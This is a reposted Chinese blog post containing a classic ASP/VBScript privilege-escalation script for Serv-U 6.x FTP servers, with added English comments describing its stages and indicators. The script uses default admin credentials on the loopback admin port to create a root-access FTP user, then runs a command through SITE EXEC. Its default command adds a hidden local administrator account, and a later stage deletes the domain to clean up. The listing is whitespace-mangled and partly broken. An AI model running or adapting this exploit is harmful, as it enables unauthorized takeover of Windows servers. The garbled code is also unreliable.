Serv-U 6.X 提权脚本

信息来源: http://www.cnsst.org/
Author:落叶纷飞

使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。
  1 < %@ LANGUAGE  =  VBScript % >
  2 < %
' Serv-U 6.x privilege-escalation script (classic ASP / VBScript), kept as
' reposted. The listing is whitespace-mangled (spaces inside string
' literals, "< %" / "% >" tags, missing commas in the .open calls), so the
' comments below describe what the code is written to do, not a verified run.
' Stages, chosen by the "action" field:
'   1 = log in to the Serv-U admin port on 127.0.0.1, then create a domain
'       and an FTP user whose home is the drive root with access flags
'       RWAMELCDP;
'   2 = log in as that user and send the command through SITE EXEC;
'   3 = log in as admin again and delete the domain (cleanup);
'   anything else = abort stored requests and render the entry form.
' Defensive reading: the whole chain needs ASP execution on the same host,
' loopback access to the admin port with the credentials given as form
' defaults below, and SITE EXEC honoured for the created user. Indicators
' that are visible in this listing: a Serv-U domain named "leaves", FTP
' user "luo", a local account "leaves" added to Administrators, and
' loopback connections to the admin port from the process hosting this page.
  3 Dim  user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
  4 dim  action
' action selects the stage; a non-numeric value ends the response.
  5 action = request( " action " )
  6 if    not   isnumeric (action)  then  response.end
' u/p are sent as the User/Pass login; port is the admin port used in the
' 127.0.0.1 URL; c is the command later passed to SITE EXEC.
  7 user  =   trim (request( " u " ))
  8 pass  =   trim (request( " p " ))
  9 port  =   trim (request( " port " ))
 10 cmd  =   trim (request( " c " ))
' f is the target drive as "X:" — the first two characters of the request
' value, or, when empty, the drive of the Windows folder from Gpath().
 11 f = trim (request( " f " ))
 12 if  f = ""   then
 13 f = gpath()
 14 else
 15    f = left (f, 2 )
 16 end   if
' NOTE(review): ffport and iip are not assigned anywhere in this listing,
' and timeout is not referenced again.
 17 ftpport  =  ffport
 18 timeout = 3
 19
' Serv-U admin-protocol payload, one command per CRLF-terminated line:
' login, SITE MAINTENANCE, -DELETEDOMAIN for the domain on iip:ftpport,
' -SETDOMAIN creating domain "leaves" on iip:ftpport, -SETUSERSETUP creating
' user "luo" / password "ye" with HomeDir c:\ and access flags RWAMELCDP on
' the drive root (quota, ratios and limits switched off), then QUIT.
 20 loginuser  =   " User  "   &  user  &  vbCrLf
 21 loginpass  =   " Pass  "   &  pass  &  vbCrLf
 22 deldomain  =   " -DELETEDOMAIN "   &  vbCrLf  &   " -IP= "   &  iip  &  vbCrLf  &   "  PortNo= "   &  ftpport  &  vbCrLf
 23 mt  =   " SITE MAINTENANCE "   &  vbCrLf
 24 newdomain  =   " -SETDOMAIN "   &  vbCrLf  &   " -Domain=leaves| "   &  iip  &   " | "   &  ftpport  &   " |-1|1|0 "   &  vbCrLf  &   " -TZOEnable=0 "   &  vbCrLf  &   "  TZOKey= "   &  vbCrLf
 25 newuser  =   " -SETUSERSETUP "   &  vbCrLf  &   " -IP=0.0.0.0 "   &  vbCrLf  &   " -PortNo= "   &  ftpport  &  vbCrLf  &   " -User=luo "   &  vbCrLf  &   " -Password=ye "   &  vbCrLf  &  _
 26          " -HomeDir=c:\\ "   &  vbCrLf  &   " -LoginMesFile= "   &  vbCrLf  &   " -Disable=0 "   &  vbCrLf  &   " -RelPaths=1 "   &  vbCrLf  &  _
 27          " -NeedSecure=0 "   &  vbCrLf  &   " -HideHidden=0 "   &  vbCrLf  &   " -AlwaysAllowLogin=0 "   &  vbCrLf  &   " -ChangePassword=0 "   &  vbCrLf  &  _
 28          " -QuotaEnable=0 "   &  vbCrLf  &   " -MaxUsersLoginPerIP=-1 "   &  vbCrLf  &   " -SpeedLimitUp=0 "   &  vbCrLf  &   " -SpeedLimitDown=0 "   &  vbCrLf  &  _
 29          " -MaxNrUsers=-1 "   &  vbCrLf  &   " -IdleTimeOut=600 "   &  vbCrLf  &   " -SessionTimeOut=-1 "   &  vbCrLf  &   " -Expire=0 "   &  vbCrLf  &   " -RatioUp=1 "   &  vbCrLf  &  _
 30          " -RatioDown=1 "   &  vbCrLf  &   " -RatiosCredit=0 "   &  vbCrLf  &   " -QuotaCurrent=0 "   &  vbCrLf  &   " -QuotaMaximum=0 "   &  vbCrLf  &  _
 31          " -Maintenance=System "   &  vbCrLf  &   " -PasswordType=Regular "   &  vbCrLf  &   " -Ratios=None "   &  vbCrLf  &   "  Access=c:\\|RWAMELCDP "   &  vbCrLf
 32 quit  =   " QUIT "   &  vbCrLf
' Rebase the hard-coded c: in the user setup onto the drive chosen in f.
 33 newuser = replace (newuser, " c: " ,f)
 34 select   case  action
 35 case   1
' Stage 1: post the payload to the local admin port. The XMLHTTP object is
' stored in Session so the "case else" branch can abort it later.
 36      set  a = Server.CreateObject( " Microsoft.XMLHTTP " )
 37     a.open  " GET " " http://127.0.0.1: "   &  port  &   " /leaves/upadmin/s1 " , True "" ""
 38     a.send loginuser  &  loginpass  &  mt  &  deldomain  &  newdomain  &  newuser  &  quit
 39      set  session( " a " ) = a
' The HTML below re-posts the same values with action=2 after 4 seconds.
 40 % >
 41 < form method = " post "  name = " leaves " >
 42 < input name = " u "  type = " hidden "  id = " u "  value = " <%=user%> " ></ td >
 43 < input name = " p "  type = " hidden "  id = " p "  value = " <%=pass%> " ></ td >
 44 < input name = " port "  type = " hidden "  id = " port "  value = " <%=port%> " ></ td >
 45 < input name = " c "  type = " hidden "  id = " c "  value = " <%=cmd%> "  size = " 50 " >
 46 < input name = " f "  type = " hidden "  id = " f "  value = " <%=f%> "  size = " 50 " >
 47 < input name = " action "  type = " hidden "  id = " action "  value = " 2 " ></ form >
 48 < script language = " javascript " >
 49 document.write( ' <center>正在连接 127.0.0.1:<%=port%>,使用用户名: <%=user%>,口令:<%=pass%><center>');
 50 setTimeout( " document.all.leaves.submit(); " , 4000 );
 51 </ script >
 52 < %
 53 case   2
' Stage 2: log in to the new domain on ftpport as luo/ye and send
' "site exec <cmd>". This is the step where the command is executed —
' presumably under the account the Serv-U service runs as; not shown here.
 54      set  b = Server.CreateObject( " Microsoft.XMLHTTP " )
 55     b.open  " GET " " http://127.0.0.1: "   &  ftpport  &   " /leaves/upadmin/s2 " True "" ""
 56     b.send  " User luo "   &  vbCrLf  &   " pass ye "   &  vbCrLf  &   " site exec  "   &  cmd  &  vbCrLf  &  quit
 57     set  session( " b " ) = b
' The HTML below re-posts the same values with action=3 after 4 seconds.
 58 % >
 59 < form method = " post "  name = " leaves " >
 60 < input name = " u "  type = " hidden "  id = " u "  value = " <%=user%> " ></ td >
 61 < input name = " p "  type = " hidden "  id = " p "  value = " <%=pass%> " ></ td >
 62 < input name = " port "  type = " hidden "  id = " port "  value = " <%=port%> " ></ td >
 63 < input name = " c "  type = " hidden "  id = " c "  value = " <%=cmd%> "  size = " 50 " >
 64 < input name = " f "  type = " hidden "  id = " f "  value = " <%=f%> "  size = " 50 " >
 65 < input name = " action "  type = " hidden "  id = " action "  value = " 3 " ></ form >
 66 < script language = " javascript " >
 67 document.write( ' <center>正在提升权限,请等待,<center>');
 68 setTimeout( " document.all.leaves.submit(); " , 4000 );
 69 </ script >
 70 < %
 71 case   3
' Stage 3: log back in to the admin port and delete the domain created in
' stage 1, then report the command that was sent.
 72      set  c = Server.CreateObject( " Microsoft.XMLHTTP " )
 73     c.open  " GET " " http://127.0.0.1: "   &  port  &   " /leaves/upadmin/s3 " True "" ""
 74     c.send loginuser  &  loginpass  &  mt  &  deldomain  &  quit
 75      set  session( " c " ) = c
 76 % >
 77 < center > 提权完毕,已执行了命令:
 78 < font color = red >< % = cmd% ></ font >
 79
 80
 81 < input type = button value = "  返回继续  "  onClick = " location.href='<%=gname()%>'; " >
 82 </ center >
 83
 84 < %
 85 case   else
' Entry / reset: abort and release any XMLHTTP objects left in Session
' (errors are ignored), then render the form.
 86 on   error   resume   next
 87      set  a = session( " a " )
 88      set  b = session( " b " )
 89      set  c = session( " c " )
 90     a.abort
 91      Set  a  =   Nothing
 92     b.abort
 93      Set  b  =   Nothing
 94     c.abort
 95      Set  c  =   Nothing
' The form below carries the defaults stage 1 sends unchanged: user
' LocalAdministrator, admin port 43958, ffport 65500, iip 0.0.0.0, the drive
' from f, and a default command that creates local user "leaves" and adds it
' to the Administrators group.
 96 % >
 97 < center >< form method = " post "  name = " leaves " >
 98    < tr align = " center "  valign = " middle " >
 99      < td colspan = " 2 " > Serv - 6 .X 提权脚本 by 落叶纷飞【S.S.T】 @ 肇庆 </ td >
100
101    </ tr >
102    < tr align = " center "  valign = " middle " >
103      < td width = " 200 " > 用户名: </ td >
104
105      < td width = " 400 " >< input name = " u "  type = " text "  id = " u "  value = " LocalAdministrator " ></ td >
106
107    </ tr >
108    < tr align = " center "  valign = " middle " >
109      < td > 口 令: </ td >
110
111      < td >< input name = " p "  type = " text "  id = " p "  value = " #l@$ak#.lk;0@P " ></ td >
112
113    </ tr >
114    < tr align = " center "  valign = " middle " >
115      < td > 端 口: </ td >
116
117      < td >< input name = " port "  type = " text "  id = " port "  value = " 43958 " ></ td >
118
119 服务器端口:
120
121      < td >< input name = " ffport "  type = " text "  id = " ffport "  value = " 65500 " ></ td >
122
123 服务器IP:
124
125      < td >< input name = " iip "  type = " text "  id = " iip "  value = " 0.0.0.0 " ></ td >
126
127    </ tr >
128    < tr align = " center "  valign = " middle " >
129      < td > 系统路径: </ td >
130
131      < td >< input name = " f "  type = " text "  id = " f "  value = " <%=f%> "  size = " 8 " ></ td >
132
133    </ tr >
134    < tr align = " center "  valign = " middle " >
135      < td > 命 令: </ td >
136
137      < td >< input name = " c "  type = " text "  id = " c "  value = " cmd /c net user leaves cnsst /add & net localgroup administrators leaves /add "  size = " 50 " ></ td >
138
139    </ tr >
140    < tr align = " center "  valign = " middle " >
141      < td colspan = " 2 " >< input type = " submit "  name = " Submit "  value = " 提交 " >
142        < input type = " reset "  name = " Submit2 "  value = " 重置 " >
143        < input name = " action "  type = " hidden "  id = " action "  value = " 1 " ></ td >
144    </ tr >
145 </ form ></ center >
146
147
148 使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。
149 < end   select
150 function  Gpath()
' Returns the drive of the Windows folder as a lower-case "x:" string
' (GetSpecialFolder(0)), or "c:" when Scripting.FileSystemObject cannot be
' created. Runs under On Error Resume Next, so statement order matters:
' err.number is only checked immediately after CreateObject.
' NOTE(review): if GetSpecialFolder itself fails, gpath appears to stay
' Empty and the caller receives "" instead of "c:" — confirm before relying
' on the fallback.
151 on   error   resume   next
152     err.clear
153      set  f = Server.CreateObject( " Scripting.FileSystemObject " )
154      if  err.number > 0   then
155 gpath = " c: "
156          exit   function
157      end   if
158 gpath = f.GetSpecialFolder( 0 )
159 gpath = lcase ( left (gpath, 2 ))
160 set  f = nothing
161 end function
Function  GName()
    ' Builds the absolute URL of the current script from the request's
    ' server variables. The port segment is omitted only when SERVER_PORT
    ' is "80"; the script name is always lower-cased.
    Dim  scheme, hostPart, pathPart
    scheme = " http:// "
    hostPart = request.servervariables( " server_name " )
    pathPart = lcase (request.servervariables( " script_name " ))
    If  request.servervariables( " SERVER_PORT " ) <> " 80 "   Then
        hostPart = hostPart & " : " & request.servervariables( " SERVER_PORT " )
    End If
    GName = scheme & hostPart & pathPart
End Function
169 % >
170

转载于:https://www.cnblogs.com/3xp10d3r/articles/1038528.html
